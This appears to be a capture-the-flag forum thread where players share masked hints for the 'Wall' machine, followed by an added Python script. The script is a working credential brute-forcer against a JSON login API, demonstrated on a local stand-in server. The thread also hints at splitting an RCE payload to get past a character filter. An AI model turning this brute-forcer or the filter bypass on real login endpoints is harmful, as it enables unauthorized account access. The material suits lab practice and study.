Wall

Can someone explain @argot's teacher hint in a little more detail? I don't get it.

Any hint on the “verbs” hint? I’m not a native English speaker… I’m at the point of a “bad credentials” reply from the API, except for one cred that results in a 403. Not sure I’m on the right path.

After we found the pages, is it the LFI or the SQL injection method? I tried brute force with top verb collections, but after 4 hrs it failed. Can anyone share some more hints about the Argot theory, please?

@suretshi said:

Initial HINT for dumb people like me who can’t find c*******:

  1. First you need to find m*********.
  2. To search for m*********, you need to do the most common thing that can be done with the d**b tool, and at the same time not give it anything that is outside of its standard directory.

After that, pay all your attention to the found m*********, but, as already said, you do not need brute force!

  1. Then the question arises: what can be done other than brute-forcing?
  2. Here you need the hint about the teacher and verbs.
  3. However, this was not enough for me: note that sometimes a slash can be crucial.
  4. After that you should look at what the server told you.

I hope I haven’t suggested too much?

@suretshi Can you DM me? Or can anyone? I figured out the “verb” I was supposed to use, but I am very much a noob at web stuff and don’t really know what to do with the information I received. Thank you in advance!

rooted

So I have made a Python script to brute-force the API. It rocks, but it is taking ages…

@igaralf said:

So I have made a Python script to brute-force the API. It rocks, but it is taking ages…

Are you sure it’s working as intended? It should take seconds. The password is among the first 50. (You can PM me your script if you’d like.)

Is the username for the c***** a guessing game, or is it default?

NVM, got it!

I wrote a script to brute-force the login page and got the password, but I would like to know how to brute-force the API part. I don’t know what data to send (I tried ad***=&pass***=), but it keeps saying unauthorized.

I understand how the exploit works. But while adding the server manually, I get 403 Forbidden. Is it supposed to work like that? I believe this is why my exploit is not working either.

I enjoyed the box. Thanks @askar… To anyone that is struggling: the hints that are listed should be more than enough to get you there. I made this way harder than it had to be.

@tang0 said:

I understand how the exploit works. But while adding the server manually, I get 403 Forbidden. Is it supposed to work like that? I believe this is why my exploit is not working either.

Nope. That mechanism is kinda sketchy, but our best guess is that whenever you get 403 Forbidden it is because of the usage of some restricted chars, like space for example. That could also be used to verify (kinda) that your payload is legal.

@badman89 it could easily be guessed, but could even more easily be rocked.

Is it normal to be getting 403s on the m**n.gt.pp?

Can somebody give me a hint? Found the usual files and one protected folder, which others have also mentioned already. Please PM me.

NVM, found it.

Got root. I can try to give you hints if you PM me.

I found .php, p**.php, /s*****-s*****, and /m*********. I don’t understand the VERB hint, or how anyone discovered c*****. Can anyone PM me with what the next step should be?

This one was weird. I didn’t like that you get root and can get the user and root flags, but oh well!

@gNarv3 said:

This one was weird. I didn’t like that you get root and can get the user and root flags, but oh well!

The way to just user s***** is actually quite nice. I think the path straight to root was not intended.

[long and kinda misleading question about cve]
EDIT: got www shell. Check what special chars are not allowed in the desired field. Remove them completely; you can divide the RCE into as many parts as you want.

I wonder if it is possible to crack the hashes from the db and the restricted area? Has anyone done this?

@sazouki said:

I wrote a script to brute-force the login page and got the password, but I would like to know how to brute-force the API part. I don’t know what data to send (I tried ad***=&pass***=), but it keeps saying unauthorized.

Check the response; it should be ‘Bad credentials’.
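Two of the threads above come down to the same mechanics: a credential brute-force against the API that "should take seconds" because the hit is early in the list, and telling a miss from a hit by reading the response body (the reported shape is ‘Bad credentials’ for every wrong pair and a 403 for the one that is right). The script below is an added example and is not from this thread or from the box. It talks to a constructed local stand-in for the API, and the endpoint path, the JSON field names, the user name, the password and the word list are all assumptions made up for the demo; point `try_login` at the real host and stream a real word list to use it for real.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import error, request

# Endpoint path, JSON field names, user name and password are constructed
# for this demo; they are not the machine's real values.
API_PATH = "/api/login"
FAKE_USER = "admin"
FAKE_PASS = "sunshine1"

# Constructed mini word list. Against the real target you would stream a
# large list (rockyou-style) and expect the hit within the first few dozen.
WORDLIST = ["123456", "password", "12345678", "qwerty", "abc123",
            "monkey", "letmein", "sunshine1", "dragon", "football"]


class FakeApi(BaseHTTPRequestHandler):
    """Stand-in for the target API: 401 'Bad credentials' for every pair
    except the right one, which answers 403 like the thread describes."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        try:
            body = json.loads(self.rfile.read(length) or b"{}")
        except ValueError:
            body = {}
        if (self.path == API_PATH and body.get("username") == FAKE_USER
                and body.get("password") == FAKE_PASS):
            self._reply(403, "Forbidden")
        else:
            self._reply(401, "Bad credentials")

    def _reply(self, code, text):
        data = text.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_api():
    """Bind the stand-in to a random localhost port; return (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeApi)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def try_login(base_url, user, password, timeout=5):
    """POST one credential pair as JSON and return (status, body).
    urllib raises on 4xx, so catch HTTPError and still read its body:
    the body text is what separates a miss ('Bad credentials') from a hit."""
    payload = json.dumps({"username": user, "password": password}).encode()
    req = request.Request(base_url + API_PATH, data=payload,
                          headers={"Content-Type": "application/json"},
                          method="POST")
    try:
        with request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except error.HTTPError as exc:
        return exc.code, exc.read().decode(errors="replace")


def brute_force(base_url, user, wordlist, fail_marker="Bad credentials"):
    """Return (password, status, body) for the first reply whose body lacks
    the known failure text, or None when the list is exhausted. Keying on
    the failure text instead of 'status == 200' matters here: the correct
    pair comes back as 403, which a status-only check would walk past."""
    for password in wordlist:
        status, body = try_login(base_url, user, password)
        if fail_marker not in body:
            return password, status, body
    return None


def demo():
    """Run the attack against the local stand-in and return the hit."""
    srv, base_url = start_fake_api()
    try:
        return brute_force(base_url, FAKE_USER, WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())  # ('sunshine1', 403, 'Forbidden')
```

Two things to check if your own script "takes ages": that each request is actually reaching the endpoint (compare one manual request's status and body with what your loop sees), and that the loop stops on the first body that differs from the failure text rather than waiting for a 200 that never comes.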